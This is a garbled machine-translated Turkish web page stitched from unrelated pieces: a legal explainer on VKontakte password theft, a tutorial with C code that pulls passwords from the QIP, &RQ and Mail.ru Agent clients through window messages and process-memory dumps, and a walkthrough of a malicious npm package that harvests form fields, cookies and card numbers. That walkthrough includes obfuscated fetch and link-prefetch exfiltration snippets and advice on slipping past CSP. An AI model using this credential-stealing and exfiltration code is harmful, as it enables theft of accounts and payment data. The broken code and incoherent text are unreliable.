internet pencereler Android
Genişletmek

Tüm şifreleri çalın. "Hacking" yöntemleri - Hesaplarınızın ve Şifrelerinizin Hırsızlığı VKontakte

Herkese, sosyal ağdaki parolanın herhangi bir çevrimiçi kaynağında çaldığını bilmeyin, herhangi bir çevrimiçi kaynakta bir suçtur. Bu tür bir hırsızlık, hangi cezanın suçlayıcıyı alabileceği ve ne yapacağınız bir kurbansanız, aşağıda söyleyeceğiz.

VKontakte şifresinin gücü ne kadar gerçek?

Şifre ısınması oldukça gerçektir, bu tür bir hırsızlık, hesap sahibi için olumsuz sonuçlara neden olabilir. İnternette, kişisel bilgileri veya sahibinin itibarını yanıp sönen bilgilerin yaygınlaştırılması için hesapların nasıl saldırıya uğradıkları hakkında birçok hikaye bulabilirsiniz.

THEFTS birçok farklı şekilde gerçekleştirilir:

  • kimlik avı yardımıyla: Kullanıcı, sitenin yanlış bir sayfasına yönlendirilir, bu da oturum açma ve şifreyi girmeniz istenen, bu da eklenir;
  • kombinasyonları seçerek: Bu yöntem şifre çok basitse geçerlidir;
  • tanıdıklar veya yabancı insanlardan hileli eylemlerin bir sonucu olarak (kombinasyon bir bilgisayarda veya akıllı telefonda basitçe casusluk yaptığında, gadget sahibinin eksikliğini kullanarak).

Not!

Saldırganın eylem yöntemi ne olursa olsun, suç olarak cezalandırılabilir. Suçun bileşimi sanat altında oluşturulur. Ceza Kanunu'nun 272'si (bilgisayar bilgilerine izinsiz erişim).

Ya hackliysen?

Bir sosyal ağ vkontakte veya başkaları üzerinde hack kurban kurbanıysanız, yapmanız gereken ilk şey, hesabı engellemek için bir istek ile destek hizmeti ile iletişim kurmak. Belki de profilin sahibi olduğuna dair bazı kanıtlar vermelisin.

Çalınan şifre bir yerlerde ayarlanırsa, sosyal ağlar, e-posta vs., diğer tüm hizmetlerdeki kombinasyonları değiştirmek gerekir.

Not!

Bilgisayar Güvenliği Uzmanları, aynı şifreyi farklı sitelerde yüklemenizi önermez, çünkü bu gibi durumlarda, bir hesap tarafından kabul edilen saldırganların geri kalanını kolayca hackleyebilir.

Tüm arkadaşlar, akrabalar ve tanıdıklar, profilinizin hacklendiği konusunda uyarılmalıdır. Malefactors, sizin adınıza zararlı bağlantılar veya yardım talepleri içeren çeşitli mesajlar göndermeye çalışabilir. Arkadaşlarınız, bağlantıya inandıklarında ve tıklamaları, mesajı veya cep telefonu numarasında belirtilen hesaba listeleyebilirler.

Suçlunun eylemleri ciddi bir şekilde zarar vermeye neden olursa, kolluk kuvvetlerine başvurmak mantıklıdır. Bunu yapmak için, polise bir açıklama yazmanız gerekecek, bu da sanatın altındaki adalete davetsiz misafirlerin çekilmesi talebi içermelidir. Ceza Kanunu'nun 272'si. Bu maddeye göre, yetkisiz erişim sadece bilgi: eğer şunlar ise suçlu bir şekilde cezalandırılır.

  • yerlebir edilmiş;
  • engellendi;
  • değiştirilmiş;
  • kopyalandı.

Blokaj altında, meşru kullanıcıların verilere erişimin hedefli bir zorluğu da dahil olmak üzere, VC'nin hırsızlığı, Sanatın yaptırımları altında düştüğü gerçeği göz önüne alındığında. Ceza Kanunu'nun 272'si.

Bu tür eylemler için, aşağıdaki ceza türleri sunulur:

  • 200.000 ruble (veya 18 ay boyunca suçlunun ücretlerinin miktarında);
  • düzeltme 1 yıla kadar çalışır;
  • Özgürlük kısıtlaması, zorla iş veya 2 yıla kadar hapis cezası.

Dava göz önüne alındığında, Mahkeme bu cümlelerden hangisinin tayin edeceğine karar verecektir. Hesabın sahibinin ve diğer kişilerin neden olduğu zarar derecesi dahil olmak üzere bağlı olacaktır. Büyük hasarlara neden olursa (1.000.000 ruble'den fazla miktarda), para cezasının büyüklüğü 300.000 ruble artabilir ve hapis cezası 4 yıla kadardır.

Not!

Bir ticari şirket hesabının bir hırsızlık durumunda büyük hasar verilebilir. Bu gibi durumlarda, savunma hakkında da gidebiliriz. İş itibarısaldırganların bir sonucu olarak acı çekti.

Kendinizi bir şifrenin çalınmasından nasıl korunur?

Hırsızlığa karşı nasıl korunmanın nasıl davranılacağı konusunda iyi tanımlanmış ve anlaşılabilir kurallar vardır:

  • de kullanmayın basit kombinasyonlar, özellikle doğum, isim ve soyadınızın tarihinden ötürü, vb. Onlar kesmek çok kolaydır. Şifre, eğer şifre bir tutarsız harf, sayı, birkaç noktalama işaretinden oluşursa;
  • Şüpheli bağlantılara gitmeyin, şüpheli sitelere verilerinizi girmeyin;
  • Şifrelerinizi yabancı cihazlara kaydetmeyin ve onları asla tarayıcılarda tutmayın;
  • hesaplarınızı genel Wi-Fi ağlarından girmemeye çalışın;
  • mümkünse, Keepass gibi şifrelerin depolanmasını kullanın.

Zaten davetsiz misafir kurbanıysanız, avukatlarımıza yardım edin. Polisteki ifadenin hazırlanmasından ve yönünden başlayarak, tüm aşamada yardım edeceklerdir. Bizi arayın veya mesajınızı siteye bırakın.

Bazen yazılım geliştiricilerin dikkatsizliğini vuruyorum. Ve veriler şifrelenmiş ve yeni algoritmalar artar ve programları hacklemekten korunuyor, ancak faydayı getirmiyor.

Herhangi bir veya daha az gelişmiş kullanıcı, diskteki şifreleri depolamanın güvensiz olduğunu biliyor. Parolaların en güvenilir depolanması bir kafadur. Aynı zamanda, kullanıcı yetkilendirmesi gerektiren programların çoğu, gelecekte giriş işlemini hızlandırmak için programdaki bir şifreyi kaydetme (hatırlama) sağlar. Geliştiriciler bu işlevi farklı şekillerde uyguluyor - birisi ayar dosyalarındaki bir şifreyi, kayıt defterindeki birisini, Windows güvenli bir deposundaki birini (aynı kayıt defteri, ancak yalnızca sistem sistemine uygun fiyatlı) bir şifreyi saklar. Ağırlık depolama seçenekleri. Bununla birlikte, bu yerlerden şifreleri çalma yöntemleri gibi. Çok var kötü amaçlı programlar, ana veya ek özellik
hangisi kayıtlı Şifrelerin Hırsızlığı dan hard disk kurbanları.

Biz, çünkü sizinle, ileri düzey kullanıcılar, değil mi? Ve bu nedenle, asla şifreleri kaydettik, ancak yalnızca hatırlıyoruz. Bu durumda güvenlik şifremiz olduğu açıklamada mı? Hadi kontrol edelim.

Neye ihtiyacımız var?

  1. MS paketinden casus ++ Görsel stüdyo.veya böyle bir yardımcı program.
  2. PE araçları veya bir işlem dökümü yapmanızı sağlayan herhangi bir yardımcı program.
  3. Hex atölyesi veya diğer onaltılık editörler.
  4. MS Visual C ++ veya herhangi bir C derleyicisi.

Ne keşfedelim?

  1. Qip.. Bild 8040'ım var. (QIP.RU)
  2. & Rq.. 0.9.7.4 sürümünü kullandım. (Andrq.org)
  3. Mail.ru ajan. Sürüm 5.0, inşa 2082. (agent.mail.ru)

HACKING Şifreleri QIP.

Rus programcısı tarafından yazılı ve desteklenen ücretsiz internet çağrı cihazı. W. Qip. Onu rahatlık için seven milyonlarca hayran, bir sürü derisi ve çok sayıda faydalı özellik.
Eğer bu ICQ müşterisi yoksa - Geliştiricinin web sitesine göre son sürüm. Yükle, koş.

Açılan pencere, yetkilendirme verilerini girmemize ya da yeni başlamamızı önerir. hesap. Kayıt olmanın önemli değil yeni hesapYa da kimlik bilgilerinizle gideceksin. Hareketli.

Qip. Lütfen bize şifreyi kaydetme yeteneği verir. Şifreyi kaydetmeyeceğiz. Ayrılırken Qip. Yalnız ve Spy ++ açın. ALT + F3'ü tıklayın ve Pencere Arama iletişim kutusunu açın. Bulucu aracını fareyle alın ve hesap yöneticisi penceresine atın Qip.'fakat.

Tamam'ı tıklatın ve casus ++ bizi pencerede gösterir. İhtiyacınız olan pencere listesinde - "QIP - Sessiz İletişim!", Hangi sınıf adı TMANForm. Üzerinde, çocuk pencerelerinin ağacı, sunucuya bağlanmak için bir arayüz sağlar. TgrupBox, TcomboBox ve Tedit ile ilgileniyoruz. Bu sadece bizim UIN ve şifremiz. Sınıfların adını hatırlıyoruz.

Pencereye geri dön Qip. Bağlan düğmesine tıklayın.

Giriş iletişim kutusu kapalı. İletişim kurabilirsin. Ancak diyalog penceresinin kapalı olup olmadığını kontrol edin? Casus ++ içindeki Windows listesini güncelleyin (Key F5) ve yetkilendirme penceresini tekrar bulmaya çalışın. Qip.. ALT + F3'ü tıklayın ve arama parametrelerini girin. Pencereyi bulmak için, en az bir parametre belirlememiz gerekir: Kolu benzersiz bir pencere tanımlayıcısı, başlık - form yazıt, sınıf - pencere sınıfı adıdır. Sınıfa göre arayacağız.

Sınıf alanındaki TMANForm Window sınıfına giriyoruz. Tamam'ı tıklayın.

Ne görüyoruz? Pencere kapanmadı. Sadece görünmez ... yetkilendirme verilerine sahip alanları okumaya çalışalım. Bunu yapmak için, Windows'taki pencereleri ve sistemleri iletişim kurmak için standart mekanizmayı kullanın - mesajlar.

Programlamaya başlıyoruz.

Void ana ()
{
//
Hwnd hmanform, hgroupbox, hedit, homboxox; //
Tanımlayıcılar formları
char * puin; // UIN için tampon için işaretçi
char * ppass; // Şifre Tampon Pointer
int iuin; // uzunluğu uin.
int ipass; // Şifre uzunluğu

// Yetkilendirme iletişim penceresini bulun
Hmanform \u003d findwindow ("tmanform", 0);
//
Bir grup kontrol
hgroupboup \u003d findwindowex (Hmanform, 0, "TgroupBox", 0);

// uin ile liste "ami
Hccombobox \u003d findwindowex (hgroupboup, 0, "tombobox", 0);
//
Listedeki metnin uzunluğunu alırız
İuin \u003d SendMessage (HCOMBOBOX, WM_GETTEXTLEDLENGTH, 0, 0) +1;
//
Tampon için gerekli belleği seçin
Puin \u003d (char *) localalloc (0, iuin);
//
Doğrudan metin alıyoruz
SendMessage (hccombobox, wm_gettext, iuin, (uzun) puin);

// şifre ile alan
Hedit \u003d findwindowex (hgroupbox, 0, "tedit", 0);
//
Her şeyden önce uin "ohm ile analoji

ppass \u003d (char *) localallloc (0, iPass);

//Hadi olanları verelim
Cout<< "[!!!]Found for: "<< pUIN << "\tPassword: " << pPass;

// Boş hafıza
Yerel ücretsiz (puin);
YerelÜç (PPiyat);
}

Tasarruf, derleme, koş. Biz ne yaptık? Her şey doğru yapılırsa, program içeren dize döndürür. uIN ve şifreniz.

Eğer başlarsak, belirtilmelidir. Qip."Kaydet Şifresi" seçeneğinin daha önce kurulduğu, daha sonra bu bir şifre elde etme yöntemi çalışmaz, çünkü metin şifre alanında "<:HIDDEN:>"Görünüşe göre, geliştirici, kulağın kenarı hala güvenlik hakkında duyuyordu.

Şifreleri Hacks & RQ

Ayrıca ücretsiz ve daha az popüler Qip., Şefkatle "sıçan" olarak adlandırılan ICQ-Client. Sıçan, Geliştirici Topluluğu tarafından eklentileri, derileri destekler ve desteklenir.

Son kararlı versiyonu offsite'den sallayın ve çalışmaya başlayın.

Başladıktan sonra & Rq. UIN'nizi belirtmeniz veya yeni bir tane kaydetmeniz gereken yeni bir profil oluşturmamızı sağlayın. Daha sonra, arayüzün dilini seçmesi önerilir ve program güvenli bir şekilde başlar. Sıçanın sunucuya bağlanması için, "çevrimiçi" durumunu seçmeniz gerekir. Program bir şifre ister ve bağlanır. Başlattığınızda otomatik olarak bağlanmanız gereken programı belirleyebilirsiniz, ayarlardaki "Çalıştır" çerçevesine (ALT + P) "çalıştırıldığında bağlanın" için gereklidir. Zorunlu değil. Bizim için "Şifreyi kaydetme" seçeneği, "Güvenlik" kategorisi ayarlarında önemlidir. Sergilemek.

"Bağlantı" çerçevesine gidin. Bu kategori için bizim için dikkat çeken nedir? "Şifre" alanı olduğu gerçeği. Bu durumu hatırlıyoruz. Sıçanı kapatacağım.

Tekrar açacağım. Bağlanmak için, şifreyi belirlememiz gerekir, çünkü "şifreyi kaydetme seçeneğini belirleme seçeneğini belirledik." Bir şifreyi tanıtıyoruz, bağlan. Ayarlar iletişim kutusunu tekrar arayın. Şaşırtıcı bir şekilde, "şifre" alanı metin içeriyor. Bu bizim şifremiz mi? Kontrol.

Spy ++ yardımcı programını kullanarak, pencerelerin adlarını öğrenin & Rq.Ve kod yazmaya başlayalım.

Void ana ()
{
// İş için gerekli değişkenleri beyan edelim
HWND HMAINFRM, HPRFFRM, HPANEL, HCONNECTIONFR, HEDIT; //
Tanımlayıcılar formları
char * puin; // UIN için tampon için işaretçi
char * ppass; // Şifre Tampon Pointer
int iuin; // uzunluğu uin.
int ipass; // Şifre uzunluğu

// Ana pencere ve RQ. Ondan uin alacağız
Hmainfrm \u003d findwindow ("tmainfrm", 0);
//
Metin uzunluğu
İuin \u003d SendMessage (HmainFrm, WM_GetTextLed, 0, 0) +1;
//
Tampon Seç
Puin \u003d (char *) localalloc (0, iuin);
//
Ana pencerenin başlığını alıyoruz - bu uin
GetWindowText (hmainfrm, puin, iuin);

/*
Başlangıç \u200b\u200bve RQ, Ayarlar penceresi olduğunda
Ana pencere ile açılmaz. Ama peki ya biz
Açılmasını önler? Özellikle de nazikçe sağlandığımızdan beri
Sıcak tuşları kullanabilme (ALT + P). Buraya
Ve onların basıldığını taklit ediyorum.

*/
// Alt + P Emülasyonu - Ayarlar penceresini aramak için kısayol tuşu
Sendmessage (hmainfrm, wm_syskeydown, "P", 0x20000000);
Sendmessage (hmainfrm, wm_syskeyup, "p", 0x20000000);

// Ayarlar penceresini buluruz
hpreffrm \u003d findwindow ("tpreffrm", 0);
//
Ayarlar Kategorileriyle Panel
HPANEL \u003d FindWindowex (HPRFFRM, 0, "TPANEL", 0);
//
Bağlantı ayarları ile çerçeve
Hconnectionfr \u003d findwindowex (hpanel, 0, "tconnectionfr", 0);
//
Şifreli alan
Hedit \u003d findwindowex (hconnectionfr, 0, "tedit", 0);

// Şifre uzunluğu
IPASS \u003d SendMessage (HEDIT, WM_GETTEXTLEDLENGT, 0, 0) +1;
//
Tampon Seç
ppass \u003d (char *) localallloc (0, iPass);
//
Bir şifre alıyoruz
SendMessage (HEDIT, WM_GETTEXT, IPASS, (uzun) PPES);

// Sonucu göster
Cout<< "[!!!]Found for: "<< pUIN << "\tPassword: " << pPass;

// Boş hafıza
Yerel ücretsiz (puin);
YerelÜç (PPiyat);
}

Programı yürüttükten sonra, bu örnek çalıştığından emin olabilirsiniz. Şifremizi aldık. Aynı zamanda, eğer Qip. Diskteki şifreyi kaydetme durumunda, şifreyi gizler, o zaman & Rq. Şifrenin nasıl tanıtıldığını umursamıyor. Ayarlar penceresinde, şifre her zaman algılanabilir.

Tek nüans budur & Rq. Baştan Sonra Ayarlar penceresini açmaz, bir kez kapatıldıktan sonra ayarların açık penceresi tekrar kapatılmadığında, ancak sadece görünmez hale gelir. Kaynak kodunda, ayarlar penceresinin açık olduğundan emin olmak için kısayol tuşunu kullandık.

Şifreleri Hacks Mail.ru Agent

Şirket tarafından sağlanan ağda iletişim kurmanın bir başka yolu Mail.ru.. Kendi protokolünde çalışır, harici telefon numaralarına erişim ile sesli iletişim olasılığına sahiptir. Bir sürü fırsatı var ve buna göre, günlüklerinden yararlanan hayranları var.

Durumunda Mail.ru ajan Başka bir yaklaşım kullanacağız. Biraz daha karmaşık, ancak daha az etkili değil. Windows'u izlemeyeceğiz. İşlem belleğinde bir şifre bulmaya çalışalım.

Dolayısıyla, ihtiyacınız olursa ve çalıştırırsanız sallanır, yükler, kayıt yaptırırız.

Temsilci, birkaç kullanıcı hesabını ve kayıt defterindeki listelerini destekler. HKEY_CURRENT_USER \\ Software \\ mail.ru \\ agent \\ magent_logins şubesinde, çok sayıda REG_Binary parametresi oluşturur, yerel bilgisayarda kaç tane hesap kaydedilir. Anahtarlar aşağıdaki gibi denir: NNN # your_email_adress, burada NNN, hesabın sipariş numarasıdır.

Bakalım e-posta adresinin bellekteki olup olmadığını görelim. Bunu yapmak için, bir işlem dökümü yapmanızı sağlayan PE Araçları Yardımcı Programını kullanın.

Boşaltmayı kaydettik, hex atölyesine yükleriz. Arama iletişim kutusunu açmak için CTRL + F düğmesine tıklayın. Metin dizesi modunu seçin ve e-posta adresimizi değer alanına girin. Tamam'ı tıklatın ve editör bulundu metni tahsis eder. Zaten farkettin mi? E-posta adresinden 4 bayttan sonra bir şifredir! Bu 4 bayt nedir? Bu 32 bit şifre uzunluğu değeridir. E-posta adresi de uzunluğu var. Hepsi bu, sadece arama sürecini yapacağımızdan çok uzaklaştırmak için kalır.

// İşlev, magent.exe işleminin tutamacını döndürür
Kolu Getprocess ()
{
HPROCESSSNAP'yı kullanın; //
Anlık Görüntü İşlemlerini Kolu
Prosesertry32 PE32; // İşlem bilgisi içeren yapı

// Süreçlerin fotoğrafını çekiyoruz
Hprocesssnap \u003d createtoolhelp32snapshot (th32cs_snapprocess, 0);
Eğer (hprocesssnap \u003d\u003d invalid_handle_value) döndürürse, 0;
Pe32.dwsize \u003d SizeOF (Prosestentry32);
//
Resme geçiyoruz
Eğer (! Proses32First (HProcessNap, & PE32)) (CloseHandle (HProcessSnap); geri dönüş 0;)
yapmak.
{
//
Magent.exe ile dosya adını karşılaştırın
İf (! Lstrcmp (strupp ("magent.exe"), strupr (& pe32.szexefile))))
{
//
İstediğiniz süreci buldum, onu iade etme
İade OpenProcess (proses_all_access, false, PE32.TH32ProcessID);
}
) İken (işlem32Next (HProcessNap ve PE32));
//
Süreçlerin anlık görüntüsünü kapatın
Closehandle (hprocessnap);
Geri dönüş 0;
}

void ana ()
{
HKEY HKEY; // Kayıt defteri anahtarı tanımlayıcısı
DWORD I, T, Retcode, CVALUES \u003d 256; //
Gerekli ara değişkenler
Char regvalue; //
Kayıt Defteri Anahtarı Okuma Tamponu
DWORD CCHVALUE \u003d 1024; //
Tampon boyutu
HPROCES'ü ele alın; // işleme işlemi
char szemail; //
E-posta adresleri için tampon
int iemail; // uzunluk e-posta adresleri
Hmodule Hmodule; // Kolu Modülü
Moduleinfo modinfo; // Modül bilgisi içeren yapı
DWORD DWREDED; // İşlem dökümü içindeki bayt sayısı
char szpass; // Şifre için tampon
Bool bulundu; // Bayrak bulundu / bulunamadı şifre
char * ptmp; // Geçici tampon

HPROCESS \u003d GETPROCESS ();
Eğer (HProcess)
{
//
Saplama işlemi ile modülü tutuyoruz,
// hangi geçici olarak yeni bir akıntı yaratıyoruz
Helread Kolu \u003d CreateremoteTheRead (HProcess, Null, 0,
(Lpthread_start_routine) getmodulehandle, , 0, null);
WaitforsingleObject (HTHREAD, sonsuz);
GethReadCoDethRead (HTHREAD, (LPDWORD) & HMODULE);
Closehandle (hthrad);

// Yüklenen modül hakkında bilgi alıyoruz
GetModuleInformation (HProcess, HModule ve Modinfo, SizeOF (ModuLeinfo));

// Boşaltma Tamponu
Pbyte pbuffer \u003d yeni bayt;
//
Dökümü okuduk
READPROCESSMEMORY (HProcess, modinfo.lpbaseofdll, pbuffer,
modinfo.SizeOfImage, & dwraded);
Eğer (dwreaded\u003e 0)
{
//
Kayıt defteri anahtarını açın
Eğer (RegoPenKeyEx (HKEY_CURRENT_USER, "yazılımı \\\\ mail.ru \\\\ ajan
\\\\ magent_logins ", 0, key_query_value, & hkey) \u003d\u003d ERROR_SUCCESS)
{
İçin (t \u003d 0, retcode \u003d error_success; t< cValues; t++)
{
//
E-posta arama "s çöplüğü için kayıt defteri anahtarı ayarlarının sırasını çeviriyoruz.
Retcode \u003d RegenumValue (HKEY, T, Regvalue, & Cchvalue, NULL, NULL, NULL, NULL);
Eğer (Retcode \u003d\u003d ERROR_SUCCESS)
{
//
İlk parametre adı 4 bayt bir sayıdır, atlarız. Sonraki adres geliyor.
Lstrcpy (Szemail, (const char *) ve regvalue);
IeMail \u003d lstrlen (Szemail);
//
Komplo dökümü alanlarını yapacağımız arabelleğin vurgulandık
Ptmp \u003d (char *) localalloc (0, IEMAIL);
Bulundu \u003d yanlış;
//
Dökümü ile hareket etmek
için (i \u003d 0; ben {
eğer (bulundu) (i \u003d dwraded;) //
Fazla çuval kurmak
// Karşılaştırma için başka bir çöplük sitesi alın
Memcy (& PTMP, & PBUFFER [I], IEMAIL);
//
Karşılaştırmak
Eğer (! Memcmp (& PTMP, Szemail, IeMail))
{
//
Adresden sonra 4 bayttan sonra bir şifre var.
Memcy (SZPASS, & PBUFFER, SIDOOF (SZPASS));
//
Şifre bulundu. Sonucu göster.
Cout<< "[!!!]Found for: " << szEmail << "\tPassword: " << szPass;
Bulundu \u003d Doğru;
}
}
Yerel ücretsiz (PTMP);
}
}
RegcloseKey (HKEY);
}
}
}
}

Tamamlandı, çalıştırın, bir şifre alın. Her şey basit.

Sonuç

Ne sonuçlanabilir? Sabit diskte gizli bilgileri saklamazsak bile, savunmasızdır. Kapalı bilgi almak için her zaman bir sürü yol bulabilirsiniz ve bu yolların çoğu, herkesin onları tespit edebileceği kadar basit ve beklenmedik olacaktır. Sadece standart olmayan ve her şeyin ortaya çıkacağını düşünmek gereklidir.

Yukarıdaki örneklerin tümü, program geliştiricilerinin bilgi güvenliği sorununa daha yakın olduğunu dikkate almayı amaçlamaktadır. Yazar tarafından verilen kod, benzersizlik ve çok yönlülük talep etmemektedir, ancak bilgi edinme ilkesi birçok yazılım ürününe uygulanabilir.

Örnek kod değiştirilebilir, ancak yalnızca eğitici amaçlar için şiddetle tavsiye edilir.

Saldırganların saldırganların, her türlü ağ kaynağına şifreleri çalmadıklarına nasıl gitmiyorlar - sosyal ağlardaki sayfalar, çevrimiçi oyunlar, ödeme sistemleri. PESTE ağındaki kişisel verilerin hırsızlığı istatistikleri, endişe verici rakamlar. Hesaplarını kaybeden mağdurlar arasında olmamak için, hackerlar tarafından kullanılan şifreleri hırsızlığının ana yöntemlerini göz önünde bulunduralım. Bu kötü niyetli "teknolojiler" hakkında bir fikre sahip olmak, kişisel verilerin uygun güvenliği ve gizliliğini takip ederek oldukça etkili bir şekilde kafa karıştırıcı olabilirler.

Adalet ve ateşleme zaferi besleme süresi boyunca gerçekleşir. Malyura'nın piliçleri, velileri gagada tatlılarla yaklaşan ebeveynleri kıskanıyor, yaşamın ilk günlerinde şarkı söylemeleri gereken çok trill, ayık gücü olmaya başladı. Yiyecek almak, sadece "yerli sebep" sanatçıları yasal mirasçılardır ve piliç civcivleri yakında açlıktan ölecek.

İlk bakışta, doğanın yanan resmi, ancak internetin dijital ormanının sonsuz genişliğine benzerken: ve şifreler var; Ve karakterler var - kötülük ve nazik - bilgisayar korsanları ve sıradan kullanıcılar.

Öyleyse, sevinçli girişlerinizi ve şifrelerinizi, bir sublegate'den kurtarmak için sevgili bir okuyucu, elbette trills görmek zorunda kalmayacaksınız. Ancak kişisel verileri kaçırmanın yollarıyla tanışmak için, çok gereksiz olmayacak ... Dünyayı ister misin? Savaşa hazır olun!

Bu yöntemdeki saldırganın ana araçları, kullanıcının saf ve aşırı merakıdır. Gelişmiş yazılım yöntemleri, kurnaz virüsler ve diğer hacker teknolojileri yoktur.

Yalnızca posta kutusundan giriş yaptığını bilerek, giriş formuna getirir. Ve sonra şifreyi unutan sistemi bilgilendirir. Monitör test sorusunu vurgular - Hacker onun için cevabı bilmiyor, ancak içeriğini zaten biliyor. Bu, en "ilginç" başlayan yerdir: Sorunun konusu temelinde, doğru cevabın örtülü formda çalıştığı "zor bir mektubun" mağdurunu gönderir. Sinsi mesaj böyle bir şeye benzeyebilir: "İyi günler! Biz, böyle bir şeyin mutfak alanı, ....., vb. Ve en sevdiğin yemeğin hangisi? " Ve bu sadece ayrı bir örnektir. Bu türün temizlenmesi "Ağın üzerinden yürür" Büyük mn zhenya . Sosyal mühendislik hakkında sosyal mühendislik hakkında bir makale yazdık. Öyleyse her ikisine de bakın, harfleri okuyun!

Yemek kurabiyesi (çerez)

Çerezler (İngilizce'den. Çerez - Çerezler) - Web sitesinin kullanıcının tarayıcısına kaydettiği oturumlarla bir dosya. İçinde, kaydedilen bir formda, giriş, şifre, kimlik ve diğer bilgiler, kaynağın çevrimiçi çalışmalar sırasında periyodik olarak atıfta bulunduğu yerlerde depolanır.

Belirli bir sitenin kırılganlığını bilerek (Forum, Posta Servisi, Sosyal Ağ) Hacker, kurbanın tarayıcısından kurbağaları "çeken" özel bir komut dosyasını yazar ve onu gönderir. Hesap sahibinin katılımı olmadan, bu "Kara Vaka", kötü amaçlı bir komut dosyası başlatması gereken olduğu için maliyeti değildir. Bu nedenle, göndermeden önce kod, özel bir "yem" dönüşür: Resimde, bir yazı harfi, istek, vb. Asıl görev, mağdurun önerilen bağlantıya taşınmasıdır. Ve eğer olursa, hacker komut dosyası tarayıcıdan gelen aşçılar, üçüncü taraf bir barındırma üzerine kurulu olan Sniffer (Interceptor Network trafiği) iletir. Ve ancak daha sonra, raporda söz verildiği, buluşma sitesine, video barındırma, fotoğraf galerisi, vb. Doğal olarak, bu manipülasyonların hesabının sahibi hiçbir şeyin sahibi olmadığını yönlendirir - hain prosedürün sadece 5 saniye sürer.

Bir hacker'ı Bruthet kullanarak bırakmak için, bir burunla, karmaşık şifreler oluşturun, kullanın.

Şifre hırsızlığı, sayfanıza erişebilir veya yuvarlak bir toplam olmadan ayrılamaz - burada, saldırganın mutluluğu.

Parola hırsızlığının nasıl başarılı bir şekilde uygulanabileceğini ilginç bir şekilde düşünün.

Şifreyi veya kredi kartı numarasını birçok yönden bulma. O zaman, bunun NPM paketindeki kodun uygulanmasıyla bunun nasıl yapıldığını tartışacağız.

Tüm kirli işleri gerçekleştiren kötü amaçlı kod, aşağıdakilerden bir şeyin tarayıcı sayfasını arıyor:

  • giriş için herhangi bir form;
  • Ünvanı olan bir mülke sahip bir unsur, "şifre", "CardNumber", "CVC", "Ödeme" vb.

Gönderildikten sonra, arama bilgisi bulunursa, bu sayfada kullanılması gereken bir şey var.

  • Bilgi çıkardığınız formun her biçiminden: ( belge.forms.foreach (...));
  • "Çerezleri" topluyoruz: belge.cookie;
  • bütün bu işler her zaman rastgele bir çizgiye dönüşür: const Load \u003d BTOA (JSON.Stringify (HassasSerdata));
  • ve sonra ara eve gidiyor: https://legit-nalytics.com?q\u003d$ (Viewload);
  • ve eğer kullanışlılığınız varsa - Hacker sunucusuna gönderilir.

Dünyayı ters çevir

Bu mutluluğun yayınlanması için, bir şekilde kodu potansiyel donör sitelere ulaşmak için güçlendirmeniz gerekir. Tarayıcıların genişletilmesinden ayrılmayı deneyebilirsiniz, ancak bu kadar etkili değil. Çapraz tip komut dosyası iyi bir seçenektir, ancak o (XSS'de) kendi güvenlik protokolleri vardır ve yine bu ölçekler değil. NPM çok daha iyi.

Tarayıcıdaki konsol konveksiyon renginin rengini değiştirecek bir paketi icat edebilirsiniz.

Bu "kullanışlı" güncellemeyi, bağımlılıklarınızdaki güncellemelerinizde, ağdaki mevcut mevcut paketler (herhangi bir) için çekme yardımı ile ve bekleyin.

Bir ayda, bu güncellemenin 120000 indirmesini ve 1000'den fazla siteye kodun yürütülmesini sağlıyoruz. Tabii ki, bu bir Panacea değil ve olasılık, efemeral paketi güncellemesinin açık kollarla kabul edilmeyeceği için mükemmeldir, ancak güvenlidir ve hızlı bir şekilde dikilmeyecekleri bir şansı vardır.

Ya da belki bir kaşık tartı?

Pürüzsüz ve güzel geliyor, ancak kasıtlı okuyucusunda görünebilecek bazı sorular var ve onların ayrılmaları gerekiyor.

Komut dosyası ağ istekleri - Kod hiçbir şey göndermez, yani, kalıcı bir trafik değişimi yoktur. Monte edilmiş malzemenin sıkılması, güvenlik görevlileri ve diğer test cihazlarının artık test edilmediği 19: 00-7: 00'dan itibaren gerçekleşir. Test cihazı kendisini ayırt etmek istiyor olsa bile, kod URL'si "sola", sosyal ağlara benzer şekilde değiştirir ve sevkiyat her zaman farklı zamanlarda gerçekleşir: bu sürprizin etkisidir.

NPM'de "tuhaflıklar" arayın. İyi şanslar! Geçici ve kaynak masrafları eşsizdir, bir şey varsa, bir şey varsa, kazanın, XMLHTTpRequest veya her şeyin gönderildiği ana bilgisayar adresindeki kodda hiçbir ipucu yoktur.

const i \u003d "gfudi"; Const K \u003d S \u003d\u003e S.SPlit (""). Harita (C \u003d\u003e String.FromCharCode (C.CharcoDeat () - 1)). Katıl (""); Benlik (urlwithyourpreciousdata);

const i \u003d "gfudi";

const k \u003d s \u003d\u003e s. Bölünmüş ("). Harita (c \u003d\u003e string. FromCharcode (C. Charcodeat () - 1)). katılmak ("");

benlik [k (i)] (UrlwithYourpreciousData);

"Gfudi" bir getiridir, ancak biri başına aşırı derecede harflerle ve benlik diğer ad penceresidir. Gibi her zaman hiçbir şey kullanılmadı. Bunun yerine, nerede olursanız olun, EventSource'u (UrlvavivabyDent) uygulamanız gerekir. Trafik ServiceWorker-Y'yi dinlerse bile, hiç kimse hiçbir şeyden şüphelenmez, çünkü hiçbir şey, hizmetçiyi destekleyen tarayıcılarda hiçbir şey gönderilmez.

CSP'yi koruma olarak kullanmak. CSP'nin bakış açısına göre, kodumuz bir tür etki alanına veri göndermek dışında, yasak bir şey yapmaz. Evet, CSP, XSS saldırılarıyla iyi başa çıktı ve tarayıcının iletişimini dış dünyayla sınırlandırabilir, ancak komut dosyasının eylemleri yeterince büyük değil, böylece bir şeyi analiz edebilirsiniz.

const linkel \u003d belge. CreateEnement ("link"); linkel.rel \u003d "Prefetch"; Linkel.href \u003d urlwithyourpreciousdata; belge.head.appendchild (linkel);

const Linkel \u003d Belge. Createellement ("link");

linkel. Rel \u003d "Prefetch";

linkel. Href \u003d urlwithyourpreciousdata;

belge. Kafa. Appendchild (LinKel);

Hackleme için ödeme yapmamak için, CSP'yi işleyiş bir bloke etme sisteminin (Connect-SRC) ve Interceptor Tool (Defterie-SRC) varlığı için kontrol etmeniz gerekir. Bunu böyle yapabilirsin:

Javascript.

(Document.href) .Then (Resp \u003d\u003e (Const CSP \u003d SPOR.HEADERS.GET); // CSP'nin nasıl çalıştığına bakıyoruz);

Kullanıcının ve diğer Gardenlerin hiçbir şeyden şüphelenmediğini ilk defa kontrol etmeniz gerekir.

Şimdi Nereden Çalışmalı?

